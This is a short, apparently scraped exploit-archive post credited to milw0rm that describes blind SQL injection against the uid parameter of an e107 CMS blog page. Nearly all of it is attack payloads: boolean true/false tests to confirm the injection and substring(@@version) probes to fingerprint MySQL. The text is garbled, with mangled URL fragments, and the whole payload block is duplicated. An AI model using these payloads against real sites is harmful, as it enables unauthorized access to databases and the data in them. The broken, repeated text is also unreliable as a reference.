0
exp:
Цитата
[-]note=becuse e107 using diffrent prefix/table names it's impossible to writting exploit for it 
]]>http://site.com/e107...ublog.php?uid=1]]> and 2>1/* #the page fully loaded
]]>http://site.com/e107...ublog.php?uid=1]]> and 1>3/* #page loaded whit any data and some error that say "The user has hidden their blog."
cheking the mysql version:
]]>http://site.com/e107...ublog.php?uid=1]]> and substring(@@version,1,1)=5
or
]]>http://site.com/e107...ublog.php?uid=1]]> and substring(@@version,1,1)=4
]]>http://site.com/e107...ublog.php?uid=1]]> and 2>1/* #the page fully loaded
]]>http://site.com/e107...ublog.php?uid=1]]> and 1>3/* #page loaded whit any data and some error that say "The user has hidden their blog."
cheking the mysql version:
]]>http://site.com/e107...ublog.php?uid=1]]> and substring(@@version,1,1)=5
or
]]>http://site.com/e107...ublog.php?uid=1]]> and substring(@@version,1,1)=4
©milw0rm.com
Наверх
